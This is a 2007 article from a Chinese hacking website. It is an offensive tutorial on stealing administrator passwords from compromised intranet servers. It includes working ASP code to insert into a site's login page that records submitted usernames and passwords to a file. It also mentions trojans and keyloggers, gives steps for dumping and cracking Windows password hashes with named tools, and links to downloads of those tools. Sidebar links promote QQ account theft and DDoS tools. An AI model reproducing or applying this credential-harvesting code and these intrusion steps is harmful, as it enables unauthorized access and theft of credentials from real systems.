文章 | 入侵攻击 | 安全防御 | 操作系统 | 建站技术 | 脚本编程 | 路由交换 | 灾难恢复 | 新闻资讯 | 安全公告   
下载 | 漏洞扫描 | 加密破解 | 入侵攻击 | 后门木马 | 溢出程序 | 综合工具 | 安全防护 | 原创发布 | 动画教程 
论坛 | 配服务器 | 黑客情感 | 免费资源 | 爆笑贴图 | 灌水无罪 | 会员照片 | 在线服务 | 站长博客 | 网站首页 
 您现在的位置: 盗攻网络 >> 攻防技术 >> 入侵攻击 >> 正文  

内网渗透---获取管理员密码(图)

www.daogong.net 阅读: 时间:2007-11-6 6:17:03 整理:盗攻网络
------------------------------------------------------------------

 

很多朋友问我是怎么抓对方的hash再破解的,因此这里我给大家写一篇获取管理员密码的文章,我一般不喜欢在服务器留木马或是后门,我比较喜欢利用管理员进入的方式来管理服务器.

本来想主要讲一下抓hash和跑hash的方法,其实主要是写给菜鸟朋友看的,高手请略过,想了想还是分几类来写.

1.通过社会工程学获得管理员密码

社会工程学获得管理员密码,主要是注入点猜表取管理员密码;通过webshell在服务器里面查看盘里面的东西,因为一些管理员会用txt记一些东西;通过webshell查看mssql的连接密码,用sql的连接密码尝试管理员密码;通过mysql连接密码尝试;通过flxashxp配置文件查看;通过搜索到的信息组合;等等,很多,主要是猜解.

2.通过第三方软件记录管理员密码

如在webshell上在login文件里加入代码记录管理员登录密码,这个通常在管理员md5不能破解的情况下进行记录,代码例如:

<%
dim Name,password,fso,file
Name = Request.Form("UserName")
Password = Request.Form("Password")
Const ForReading = 1, ForWriting = 2, ForAppending = 8
Set fso = Server.CreateObject("Scripting.FileSystemObject")
Const path = "存放文件的路径"
set file=fso.opentextfile(path, ForAppending, TRUE)
file.write(Name) & " "
file.write(Password) & "||"
file.close
set file = nothing
set fso = nothing
%>

在系统中可以通过gina木马记录管理员登陆的密码,或是利用键盘记录记录管理员在终端桌面的输入情况,也可能抓取到密码.

3.通过破解hash来主动获取管理员密码

这也是今天要详细写的,因为很多朋友问我怎么抓取hash和破解hash.

pwdump4可以抓取win2000的hash,是命令提示符下面的,这个简单不详说.

pwdump6也是命令行下的,可以抓取win2003,但很多情况下不稳定.

在win2000系统中,我们可以通过query user 查询管理员用户是否在,如果在我们可以从内存中读取到密码,我一般是用aio的-findpassword来读取的,因为aio的功能比较多,以前经常用mt,但mt被杀得太凶了.

如图:在win2000中,query user

说明管理员断开的时候没有注销,我们可以findpassword.如下图:

从上图可以看到从内存中读取到了密码(密码我涂掉了.)

下面我主要讲一下用saminside抓取hash,用lc5跑抓取出来的hash,saminside下载地址:http://www.ncph.net/sam.rar

lc5的下载地址:http://www.ncph.net/lc5.zip

其实使用很简单,先用saminside抓取系统的hash,如下图,打开saminside

这软件对抓取win2000和win2003都可以,且很少出错.

打开后我们用"本地计划任务"来抓取,如图:

选取"使用计划任务输入本地用户"后,等下面的进度条执行完毕后,抓取的的情况如下图:

 

   -------------------------------------------------------------------------------------------
  • 上一篇文章:

  • 下一篇文章:
  •    -------------------------------------------------------------------------------------------
    用户名:
    Email:
    评论内容:
     
      精品推荐

     入侵网站的各种漏洞的利
     一分钟攻破ADSL 盗遍宽带
     最新刷QQ服务漏洞!
     如何免费成为QQ会员
     给网吧会员卡冲钱(图文
     一分钟攻破ADSL盗遍宽带
     QQ密码本地破解
     QQ上面100%获得别人IP的
     菜鸟制作网页木马盗QQ
     最新网吧免费上网方法
     教你让内网任何一台电脑
     菜鸟+Sa+注入工具组合
     入侵后偷QQ的方法
     推荐:远程破解盗窃QQ密码
     最新DDOS拒绝攻击软件大
     利用3389得到一天可得50
     人小鬼大的黑客工具-QQ
     学黑客必读:入侵的14种可
     各种端口的入侵方法
     小心,CMD也闹鬼!(图)
     见招拆招-密码破解自成
     WIN2000 XP 2003系统密码
     轻松搞定网吧记费管理系
     著名安全站点大量免费资
     正确的4种挂马方式


    设为首页 | 软件发布 | 联系方式 | 友情链接 | 关于我们 | 本站声明 | 免责条款 | 网站留言
    Copyleft © 2004-2007 Www.Daogong.Net
    版本:盗攻网站系统V3.0 Email:daogong@126.com
    中国·上海 请使用IE6.0版本, 分辩率1024×768进行浏览
    版权所有 任意抄袭 注意完整
    鲁ICP备06001161号
    有问题找我